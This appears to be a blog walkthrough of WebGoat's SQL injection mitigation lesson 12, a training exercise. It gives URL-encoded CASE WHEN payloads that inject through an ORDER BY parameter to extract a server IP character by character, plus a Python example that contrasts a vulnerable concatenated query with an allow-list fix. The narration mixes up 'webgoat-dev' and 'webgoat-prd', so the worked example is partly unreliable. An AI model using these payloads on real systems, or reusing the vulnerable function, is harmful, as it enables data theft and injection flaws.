WebGoat SQL injection mitigation lesson 12

PVXs
3 min read · Sep 14, 2020


In the lesson for this exercise (lesson 11) WebGoat tells us that, in the case of an ORDER BY SQL statement, it is possible to check for and eventually exploit the injection by substituting the ORDER BY column with a SQL expression.

Normal ORDER BY query
SELECT * FROM users ORDER BY lastname
Malicious ORDER BY query (the CASE expression needs a closing END)
SELECT * FROM users ORDER BY (CASE WHEN (<condition>) THEN lastname ELSE firstname END)

So we still have TRUE and FALSE conditions through which we can check guessed values.
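As an added example (not code from the WebGoat lesson or from the original post), here is a small Python/sqlite3 model of the flaw this lesson is built on and of its mitigation: a constructed servers table, a vulnerable sort that concatenates the column parameter into ORDER BY, and a hardened sort that maps the parameter onto an allow-list, because an ORDER BY identifier cannot be bound as a query parameter. The payload constants are the lesson's CASE conditions written without URL encoding; the table rows and IPs are made up.

```python
import sqlite3

# Constructed sample data standing in for the lesson's "servers" table.
# Statuses are distinct so that ordering by status visibly differs from ordering by id.
SAMPLE_SERVERS = [
    (1, "webgoat-dev", "192.168.4.0", "online"),
    (2, "webgoat-tst", "192.168.2.1", "offline"),
    (3, "webgoat-acc", "192.168.4.2", "maintenance"),
]

# The lesson's TRUE and FALSE CASE conditions, decoded from the URL form.
TRUE_CASE = ("(CASE WHEN (SELECT hostname FROM servers WHERE hostname='webgoat-dev')"
             " = 'webgoat-dev' THEN id ELSE status END)")
FALSE_CASE = ("(CASE WHEN (SELECT hostname FROM servers WHERE hostname='webgoat-dev')"
              " = 'webgoat-xyz' THEN id ELSE status END)")

# Allow-list: the only identifiers the application agrees to sort by.
ALLOWED_SORT_COLUMNS = {"id": "id", "hostname": "hostname", "ip": "ip", "status": "status"}


def _connect():
    """Build an in-memory database with the constructed servers table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE servers (id INTEGER, hostname TEXT, ip TEXT, status TEXT)")
    conn.executemany("INSERT INTO servers VALUES (?, ?, ?, ?)", SAMPLE_SERVERS)
    return conn


def sort_servers_vulnerable(column):
    """Mirrors the lesson's bug: the 'column' request parameter is pasted straight
    into ORDER BY, so a CASE expression supplied there decides the sort order
    and leaks one bit (TRUE -> ordered by id, FALSE -> ordered by status)."""
    conn = _connect()
    rows = conn.execute("SELECT id, hostname FROM servers ORDER BY " + column).fetchall()
    conn.close()
    return [hostname for _, hostname in rows]


def sort_servers_safe(column):
    """Hardened version: the untrusted value is only used as a key into the
    allow-list; anything else (including the CASE payload) is rejected."""
    if column not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column: %r" % column)
    conn = _connect()
    rows = conn.execute(
        "SELECT id, hostname FROM servers ORDER BY " + ALLOWED_SORT_COLUMNS[column]
    ).fetchall()
    conn.close()
    return [hostname for _, hostname in rows]
```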

What the lesson requires is to find the IP address of the webgoat-prd server, and to make things a little easier WebGoat gives us the last three octets of the IP address:

xxx.130.219.202

Start fiddling with the webapp

Sorting by IP address

Check out what Burp tells us about the request and response

Sorting request is a GET with a ‘column’ parameter

Send the request to Burp Repeater

Single quote injection

Let’s inject a single quote in the parameter

SQL Error with query in clear text

In the response we are given the whole SQL query with table and column names

SQL injection in ORDER BY using CASE construct

The first thing I did was to check a TRUE SQL statement on something I knew, and I was given the server name (webgoat-prd)

(CASE+WHEN+(SELECT+hostname+FROM+servers+WHERE+hostname='webgoat-dev')+=+'webgoat-dev'+THEN+id+ELSE+status+END)

The ORDER BY clause here is used as follows:

  • If there is a server hostname equal to ‘webgoat-prd’ the list would be ordered by ID
  • Else it would be ordered by status

ID ordered server list

As the response is ordered by ID, I can confirm there is a server named ‘webgoat-prd’

But just in case, let’s test something FALSE as well

Checking a FALSE statement

Here the list will be ordered by ID if the hostname of the ‘webgoat-prd’ server is equal to ‘webgoat-xyz’, so we are expecting a FALSE result and an ordering by STATUS

Server list ordered by STATUS

Now that we can see the ordering is not by ID, it is possible to try and guess the IP address of the ‘webgoat-prd’ server by checking one number at a time, as follows:

# substring(IP address,1,1) = '1'
(CASE+WHEN+(SELECT+substring(ip,1,1)+FROM+servers+WHERE+hostname='webgoat-prd')+=+'1'+THEN+id+ELSE+status+END)
# substring(IP address,1,2) = '10'
(CASE+WHEN+(SELECT+substring(ip,1,2)+FROM+servers+WHERE+hostname='webgoat-prd')+=+'10'+THEN+id+ELSE+status+END)

After checking all possible numbers for every position, the solution is

# substring(IP address,1,4) = '104.'
(CASE+WHEN+(SELECT+substring(ip,1,4)+FROM+servers+WHERE+hostname='webgoat-prd')+=+'104.'+THEN+id+ELSE+status+END)

The rest of the IP address is already given, but you can go ahead and check the whole IP string if you like

This concludes WebGoat SQL injection mitigation 12

I hope you liked it

PVXs — https://twitter.com/pivixih
